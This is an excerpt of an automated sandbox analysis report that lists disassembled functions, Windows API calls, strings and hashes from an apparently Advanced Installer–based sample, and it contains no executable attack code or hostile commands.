                                                    • String ID: ?(-|/)+q$($Launch failed. Error:$Launching file:$Return code of launched file:$appx$msix$msixbundle
                                                    • API String ID: 3689723087-3482523422
                                                    • Opcode ID: 73189733bc86e1ed2dae495245128051d411ec25559f45b920053e6350a03767
                                                    • Instruction ID: eef86c782c040fe921106de2b5115f052eb98dc2e4ab9025916e7dfb412b0286
                                                    • Opcode Fuzzy Hash: 73189733bc86e1ed2dae495245128051d411ec25559f45b920053e6350a03767
                                                    • Instruction Fuzzy Hash: CF92B071D00219CFDB25DFA8C845BEDBBB0BF45314F258299E415AB292EB706A85CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00365580 Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 389nativememoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00365A10: EnterCriticalSection.KERNEL32(0063E7BC,D13B3340,00000000,?,?,?,?,?,?,>R6,0054B23D,000000FF), ref: 00365A4D
                                                      • Part of subcall function 00365A10: LoadCursorW.USER32(00000000,00007F00), ref: 00365AC8
                                                      • Part of subcall function 00365A10: LoadCursorW.USER32(00000000,00007F00), ref: 00365B6E
                                                    • SysFreeString.OLEAUT32(00000000), ref: 00365623
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0036572B
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0036573B
                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00365746
                                                    • NtdllDefWindowProc_W.NTDLL(?,?,00000001,?), ref: 00365754
                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00365762
                                                    • SetWindowTextW.USER32(?,005B329C), ref: 00365801
                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00365836
                                                    • GlobalLock.KERNEL32 ref: 00365844
                                                    • GlobalUnlock.KERNEL32(?), ref: 00365898
                                                    • SetWindowLongW.USER32(?,000000EB,00000000), ref: 00365923
                                                    • SysFreeString.OLEAUT32(00000000), ref: 0036593C
                                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,00000000), ref: 00365983
                                                    • SysFreeString.OLEAUT32(00000000), ref: 003659A2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$FreeGlobalString$CursorLoadNtdllProc_$AllocCriticalEnterLockSectionTextUnlock
                                                    • String ID: >R6$>R6
                                                    • API String ID: 1808742688-1283833623
                                                    • Opcode ID: f00f0a732b2b84ba29858773a76b9404cf78376764a69cd3a3203cbb39756fe0
                                                    • Instruction ID: 26a9c0fa4c3bec8fe272e9a7f6e6e0e12e2744e4c8fc51a43da66a09feaa497a
                                                    • Opcode Fuzzy Hash: f00f0a732b2b84ba29858773a76b9404cf78376764a69cd3a3203cbb39756fe0
                                                    • Instruction Fuzzy Hash: 97D1C171A00609EFDB12DFA4CC48BAFBBB9EF45320F148168F911A7295D7759A04CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037C363 Relevance: 23.8, APIs: 2, Strings: 11, Instructions: 1036COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SysFreeString.OLEAUT32(00000000), ref: 0037C697
                                                    • SysFreeString.OLEAUT32(00000000), ref: 0037C82C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: FreeString
                                                    • String ID: GetFontHeight$MessageBox$MsiEvaluateCondition$MsiGetBinaryPath$MsiGetBinaryPathIndirect$MsiGetBytesCountText$MsiGetFormattedError$MsiGetProperty$MsiPublishEvents$MsiResolveFormatted$MsiSetProperty
                                                    • API String ID: 3341692771-3153392536
                                                    • Opcode ID: ba4335344f5d5044d57cdb7737467add1c5140dc98ac798bca0b50f887b13af1
                                                    • Instruction ID: 91c6820c9a16087859acfbab60eb4bd2f6ef11847126363c0600937f205040ce
                                                    • Opcode Fuzzy Hash: ba4335344f5d5044d57cdb7737467add1c5140dc98ac798bca0b50f887b13af1
                                                    • Instruction Fuzzy Hash: FF928071D102499BDB25DFA4C884BDEBBB4FF49314F20831DE419BB291EB74A685CB80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003711B0 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 668fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindClose.KERNEL32(00000000), ref: 003712EF
                                                    • PathIsUNCW.SHLWAPI(?,*.*,00000000), ref: 003713A7
                                                    • FindFirstFileW.KERNEL32(?,005CFDB8,*.*,00000000), ref: 003714FC
                                                    • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000), ref: 00371516
                                                    • GetFullPathNameW.KERNEL32(?,00000000,?,00000000), ref: 00371549
                                                    • FindClose.KERNEL32(00000000), ref: 003715B8
                                                    • SetLastError.KERNEL32(0000007B), ref: 003715C6
                                                    • _wcsrchr.LIBVCRUNTIME ref: 0037161C
                                                    • _wcsrchr.LIBVCRUNTIME ref: 0037163C
                                                    • PathIsUNCW.SHLWAPI(*.*,?,D13B3340), ref: 003717D5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Path$Find$CloseFullName_wcsrchr$ErrorFileFirstLast
                                                    • String ID: *.*$\\?\$\\?\UNC\
                                                    • API String ID: 1241272779-1700010636
                                                    • Opcode ID: acefdbeed2d0f752043f11bf288025a971aaa44a56d83c79754a77e565cda14f
                                                    • Instruction ID: 9f7463f96348cc557ae9d4f1688181ebb1dbbbdf5b568b2d554ffd77eb460c6c
                                                    • Opcode Fuzzy Hash: acefdbeed2d0f752043f11bf288025a971aaa44a56d83c79754a77e565cda14f
                                                    • Instruction Fuzzy Hash: 4E3213726006029FDB25DF6CC848B6AF7F5FF55314F148268E819DB2A1EB79A904CB80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0036F420 Relevance: 21.6, APIs: 14, Instructions: 611COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0036F4D3
                                                    • ShowWindow.USER32(00000000,?), ref: 0036F4F2
                                                    • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0036F500
                                                    • GetWindowRect.USER32(00000000,?), ref: 0036F517
                                                    • ShowWindow.USER32(00000000,?), ref: 0036F538
                                                    • SetWindowLongW.USER32(?,000000EB,?), ref: 0036F54F
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                    • ShowWindow.USER32(?,?), ref: 0036F68D
                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0036F6BC
                                                    • ShowWindow.USER32(?,?), ref: 0036F6D9
                                                    • GetWindowRect.USER32(?,?), ref: 0036F6FE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window$LongShow$Rect$AllocateHeap
                                                    • String ID:
                                                    • API String ID: 283321994-0
                                                    • Opcode ID: e3aec15c4fcd3fe9a764a4f6d5e8bb5e87dac5cdc4259dd253f8c0e27390c04c
                                                    • Instruction ID: a189bb6665866010d05d386ce4cd5944cf5fb2954160dd50bd5f31eab06e58a0
                                                    • Opcode Fuzzy Hash: e3aec15c4fcd3fe9a764a4f6d5e8bb5e87dac5cdc4259dd253f8c0e27390c04c
                                                    • Instruction Fuzzy Hash: B0425A71A04209DFCB25CFA8E884A9EFBF5FF89304F10856DE849AB265D730A945CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0047EAF0 Relevance: 20.9, APIs: 2, Strings: 9, Instructions: 1604fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                      • Part of subcall function 0035A140: FindResourceW.KERNEL32(00000000,?,00000006,?,?,000000A0,80070057,8007000E,80004005,00371A24,00000000,?,?,?,*.*), ref: 0035A163
                                                    • CopyFileW.KERNEL32(?,?,00000000,00000000,00000000), ref: 0047F078
                                                    • CopyFileW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?), ref: 0047F579
                                                      • Part of subcall function 00456270: MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,00000000,00000000,?,?,006394D0,004A03D0,?), ref: 00456288
                                                      • Part of subcall function 00456270: MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,?,-00000001), ref: 004562BA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ByteCharCopyFileHeapInit_thread_footerMultiWide$AllocateFindProcessResource
                                                    • String ID: 2rT$AI_PRODUCTNAME_ARP$InstanceId$ProductCode$ProductName$\\?\$instname-custom.mst$instname-target.msi${%0.8X-%0.4X-%0.4X-%0.2X%0.2X-%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X}
                                                    • API String ID: 2868415777-4252105220
                                                    • Opcode ID: c1af67046132a0295e59860604d0dc7df94a6a3b9680a6f2a0c97e4e6ea3704b
                                                    • Instruction ID: 5aa1ac316744e08f74f19b39f94f52bd4da3675ab223dd1241f3c12c9c4aa5c9
                                                    • Opcode Fuzzy Hash: c1af67046132a0295e59860604d0dc7df94a6a3b9680a6f2a0c97e4e6ea3704b
                                                    • Instruction Fuzzy Hash: 6CD2A2709006499FDB01DFA9C844BAEBBB5FF45315F148269E809EB392DB38DD09CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0047AB40 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 420fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • FindFirstFileW.KERNEL32(?,?,?,00000001), ref: 0047AEE2
                                                    • FindClose.KERNEL32(00000000), ref: 0047AF10
                                                    • FindClose.KERNEL32(00000000), ref: 0047AF99
                                                    Strings
                                                    • No acceptable version found. It must be installed from package., xrefs: 0047B489
                                                    • No acceptable version found. It must be downloaded manually from a site., xrefs: 0047B497
                                                    • No acceptable version found., xrefs: 0047B4AC
                                                    • No acceptable version found. Operating System not supported., xrefs: 0047B49E
                                                    • No acceptable version found. It is already downloaded and it will be installed., xrefs: 0047B4A5
                                                    • Not selected for install., xrefs: 0047B4B3
                                                    • No acceptable version found. It must be downloaded., xrefs: 0047B490
                                                    • An acceptable version was found., xrefs: 0047B482
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseInit_thread_footer$FileFirstHeapProcess
                                                    • String ID: An acceptable version was found.$No acceptable version found.$No acceptable version found. It is already downloaded and it will be installed.$No acceptable version found. It must be downloaded manually from a site.$No acceptable version found. It must be downloaded.$No acceptable version found. It must be installed from package.$No acceptable version found. Operating System not supported.$Not selected for install.
                                                    • API String ID: 544434140-749633484
                                                    • Opcode ID: 4cc924c609c56ef91b8a1850edab00af0e7741ebed5cd53ef26ca4b097e08998
                                                    • Instruction ID: b4f4ada45122da7830d654b99111e6bed4ed2eb1749235f9a6c23b9d2f31f3d4
                                                    • Opcode Fuzzy Hash: 4cc924c609c56ef91b8a1850edab00af0e7741ebed5cd53ef26ca4b097e08998
                                                    • Instruction Fuzzy Hash: 7DF19D309006058FDB61DF28C9487AEFBF2FF85311F148299E8599B392DB349E45DB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037E230 Relevance: 18.1, APIs: 6, Strings: 4, Instructions: 639windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 0037E311
                                                      • Part of subcall function 00520372: EnterCriticalSection.KERNEL32(00637DCC,?,?,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 0052037D
                                                      • Part of subcall function 00520372: LeaveCriticalSection.KERNEL32(00637DCC,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 005203BA
                                                    • __Init_thread_footer.LIBCMT ref: 0037E2CE
                                                      • Part of subcall function 00520328: EnterCriticalSection.KERNEL32(00637DCC,?,?,0035ACA7,006389FC,005A5FA0), ref: 00520332
                                                      • Part of subcall function 00520328: LeaveCriticalSection.KERNEL32(00637DCC,?,0035ACA7,006389FC,005A5FA0), ref: 00520365
                                                      • Part of subcall function 00520328: RtlWakeAllConditionVariable.NTDLL ref: 005203DC
                                                    • SendMessageW.USER32(?,0000104D,00000000,?), ref: 0037E832
                                                    • SendMessageW.USER32(?,0000102B,?,0000000F), ref: 0037E8E0
                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 0037E981
                                                      • Part of subcall function 00462170: __cftof.LIBCMT ref: 004621C0
                                                    • SendMessageW.USER32(?,0000101E,00000000,0000FFFE), ref: 0037EB09
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake__cftof
                                                    • String ID: AiFeatIco$Icon$dc$dc
                                                    • API String ID: 2303580663-3304960293
                                                    • Opcode ID: 1fa88f84a6658af1c9bcf66b08169fedc738b7abe763608ca9facc6a76273549
                                                    • Instruction ID: 202aff70ef72078e95af9bc37db9379e81a9d348f652cd0e78ae005d9c9832cb
                                                    • Opcode Fuzzy Hash: 1fa88f84a6658af1c9bcf66b08169fedc738b7abe763608ca9facc6a76273549
                                                    • Instruction Fuzzy Hash: 31528A71900658CFDB25DF68CC88BDDBBB1BB89304F1081D9E44AAB291DB746E84CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004729A0 Relevance: 18.1, APIs: 9, Strings: 1, Instructions: 581COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 00472B4D
                                                    • __Init_thread_footer.LIBCMT ref: 00472CEC
                                                      • Part of subcall function 00520372: EnterCriticalSection.KERNEL32(00637DCC,?,?,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 0052037D
                                                      • Part of subcall function 00520372: LeaveCriticalSection.KERNEL32(00637DCC,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 005203BA
                                                    • GetStdHandle.KERNEL32(000000F5,?,D13B3340,?,?), ref: 00472D74
                                                    • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?), ref: 00472D7B
                                                    • GetStdHandle.KERNEL32(000000F5,0000000C,?,?), ref: 00472D8F
                                                    • SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 00472D96
                                                    • GetStdHandle.KERNEL32(000000F5,000000FF,?,00000000,?,00000000,005B5F2C,00000002,?,?), ref: 00472E25
                                                    • SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 00472E2C
                                                    • IsWindow.USER32(00000000), ref: 004730BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ConsoleHandle$AttributeCriticalInit_thread_footerSectionText$BufferEnterInfoLeaveScreenWindow
                                                    • String ID: Error
                                                    • API String ID: 2811146417-2619118453
                                                    • Opcode ID: 049b539cec61647f2529dea4980240341bccb71ea28eb1d32091f684da429e1a
                                                    • Instruction ID: 85c84bdf4d8adbfbaf14904d22ce72196b5c3414f1eb2e652ed81f4dce60a246
                                                    • Opcode Fuzzy Hash: 049b539cec61647f2529dea4980240341bccb71ea28eb1d32091f684da429e1a
                                                    • Instruction Fuzzy Hash: 02426B71D00259CFDB20CFA4C945BDEBBB1BF55314F24829AE419BB291DBB46A84CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00506840 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 197libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?), ref: 0050686D
                                                    • GetProcessAffinityMask.KERNEL32 ref: 00506874
                                                    • GetSystemInfo.KERNEL32(?), ref: 005068F5
                                                    • GetModuleHandleA.KERNEL32 ref: 00506944
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0050694B
                                                    • GlobalMemoryStatus.KERNEL32 ref: 0050699B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Process$AddressAffinityCurrentGlobalHandleInfoMaskMemoryModuleProcStatusSystem
                                                    • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                                                    • API String ID: 3120231856-802862622
                                                    • Opcode ID: 66731918d294f25df512c8bcbafed8b08a6c671a42f6836d2ad8c1f540d4008e
                                                    • Instruction ID: f466130f18767b89e8575a1f4ae55ff9a6e8e8ae9abd23d709de32f2717853b0
                                                    • Opcode Fuzzy Hash: 66731918d294f25df512c8bcbafed8b08a6c671a42f6836d2ad8c1f540d4008e
                                                    • Instruction Fuzzy Hash: C8715CB1A083118FD708CF59D89475ABBE5BFC8714F05892DE899C7391D774D908CB85
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00379650 Relevance: 17.0, Strings: 13, Instructions: 770COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $AI_DynInstances$AI_GenNewCompGuids$AI_MajorUpgrades$InstanceId$Manufacturer$OldProductCode$ProductCode$ProductVersion$UpgradeCode$Xd[$Xd[$Xd[
                                                    • API String ID: 0-4062129066
                                                    • Opcode ID: 0bc466b1994118b330732fd5cfd365b9a4b70c39bcb5f37c7abfa2c79fc33cc3
                                                    • Instruction ID: 8a5d5898888d1417c3dede12c16faef25690dc52ff22b12347dbbbda571a9668
                                                    • Opcode Fuzzy Hash: 0bc466b1994118b330732fd5cfd365b9a4b70c39bcb5f37c7abfa2c79fc33cc3
                                                    • Instruction Fuzzy Hash: 5D62E431D00259CBDF15CB64CC54BEEBBB5BF45304F248299D40ABB291DB786B85CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00364E60 Relevance: 16.9, APIs: 11, Instructions: 416nativememoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowLongW.USER32(80070216,000000EC), ref: 0036508B
                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0036509B
                                                    • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 003650A6
                                                    • NtdllDefWindowProc_W.NTDLL(00000000,00000000,00000001,80070216,?,?,80070216), ref: 003650B4
                                                    • GetWindowLongW.USER32(00000000,000000EB), ref: 003650C2
                                                    • SetWindowTextW.USER32(00000000,005B329C), ref: 00365161
                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00365196
                                                    • GlobalLock.KERNEL32 ref: 003651A4
                                                    • GlobalUnlock.KERNEL32(?), ref: 003651F8
                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0036525D
                                                    • NtdllDefWindowProc_W.NTDLL(00000000,00000000,D13B3340,00000000), ref: 003652AF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$Global$NtdllProc_$AllocLockTextUnlock
                                                    • String ID:
                                                    • API String ID: 3555041256-0
                                                    • Opcode ID: 463de8541502243dd76fe68c1a4a8b5d0bfbc04b57ffc60a5f26a99c82f0656f
                                                    • Instruction ID: 0b629d7368383baf8979127e7dc8556b055cf4c32d0119254f91a4e0d32e2510
